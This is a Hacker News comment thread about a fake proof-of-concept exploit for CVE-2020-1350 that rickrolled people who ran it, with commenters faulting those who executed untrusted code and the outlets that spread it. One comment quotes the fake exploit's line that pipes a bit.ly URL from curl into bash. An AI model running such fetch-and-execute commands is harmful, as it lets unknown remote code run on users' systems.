
The day I trolled the entire internet: accidental research project CVE-2020-1350 - beefhash
https://blog.zsec.uk/cve-2020-1350-research/
======
kerng
This post requires a lot of context to make sense out of. Unless you are in
the security space and familiar with what happened last 36 hours, it probably
won't make much sense quickly.

1) Microsoft has a critical flaw in DNS server

2) A security company publishes the info - no public exploit available at this
point

3) Someone creates a fake exploit - playing a prank on hackers and other
security companies

4) Lots of people ran the prank code or helped spread the existence of the
fake exploit

Not sure if this makes it easier to understand- at least I tried. :)

------
speedgoose
This is very difficult to read and understand.

~~~
ogre_codes
That's my take. Just random garbage. There is a thread of something in there,
but I don't have the time/ energy to quite get it. Something about a fake
hack, Rickrolling, and piping curl to the shell. Beyond that I gave up because
it's too poorly organized.

~~~
greenshackle2
Yeah they completely fail to explain the context.

CVE-2020-1350 is a real vulnerability that was published just yesterday:

[https://nvd.nist.gov/vuln/detail/CVE-2020-1350](https://nvd.nist.gov/vuln/detail/CVE-2020-1350)

It's a brand new vuln so people would be interested in a proof of concept. The
author created a git repo that was nominally a PoC exploit for this
vulnerability but was really just a troll, and publicized it on twitter.

Some people ran the "proof of concept" code without reading it first and got
trolled. If the author had been malicious they could have done something much
worse than rickrolling.

The repo also contains a real fix for the vulnerability.

This is a particularly "amusing" troll because the sort of people who keep up
with CVEs and look for proof-of-concept exploits should really know better
than to run random code they just got off GitHub without checking what it
does.

It's obvious with the most _cursory_ examination of the code in the repo that
you shouldn't run it, exploit.sh contains:

    
    
       curl -L https://bit.ly/3exifav | bash

------
stedaniels
Took one glance at the shell script piping curl to bash and red flags went up
everywhere! Not only piping curl to bash, but doing it via a bit.ly link. Then
Twitter and the media started to pick it up and pass it on unverified. I
should have been shocked, but I wasn't. I'd love to see the bit.ly stats for
the short URLs added to the article.

------
3pt14159
I'm sure people are stupid, I've seen it myself too many times to count, but
how does he know that these weren't executed in a VM? A couple hundred shells
isn't so much that I'd rule out that some non-trivial fraction of them were
under analysis.

------
petercooper
I imagine the reason this doesn't happen too often in serious domains is
because the next time the person says/posts anything, will they be believed
without checking their claims? Of course, in security, this may even be a good
thing?(!) :-)

------
Sodman
I think the interesting thing here is that outlets like Vulcan picked it up
and wrote about it with authority. Linking to the repo from these "trusted"
sources likely gave it a lot more credibility than it would otherwise have
received.

------
dapids
Is the blog post fake too? Seriously, this was hard to read...

------
floatingatoll
I was unable to scroll this article on mobile to read it. It seems like it
could be interesting, but it’s too bad about the technical obstacles to doing
so.

------
_tk_
With the numbers shown "the entire internet" is really more than exaggerated
and thus the title seems pretty clickbait-y.

------
curiousgal
TL;DR: posted fake PoC on GitHub. (I think, the post is littered with embedded
tweets and memes, super hard to read or make sense of any of it)

~~~
kevsim
Yeah, I think that's the gist. Fake PoC of a CVE, people ran random code,
author caught them in the act via a canary token [0] and rickrolled them.

0: [https://blog.thinkst.com/p/canarytokensorg-quick-free-
detect...](https://blog.thinkst.com/p/canarytokensorg-quick-free-
detection.html)

